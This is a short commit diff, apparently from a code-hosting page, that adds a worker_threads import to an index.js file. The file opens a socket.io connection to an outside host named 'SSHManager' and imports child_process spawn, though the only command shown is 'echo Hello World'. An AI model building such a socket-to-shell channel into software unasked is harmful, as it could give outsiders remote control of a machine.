quanvndzai commited on
Commit
bbae846
1 Parent(s): b7c2741

Update index.js

Browse files
Files changed (1) hide show
  1. index.js +1 -0
index.js CHANGED
@@ -1,4 +1,5 @@
1
  const io = require("socket.io-client");
 
2
  const socket = io("https://SSHManager.onenew.repl.co");
3
  const { spawn } = require('child_process');
4
  var ls = spawn("echo", ["Hello World"]);
 
1
  const io = require("socket.io-client");
2
+ const { workerData, parentPort } = require('worker_threads')
3
  const socket = io("https://SSHManager.onenew.repl.co");
4
  const { spawn } = require('child_process');
5
  var ls = spawn("echo", ["Hello World"]);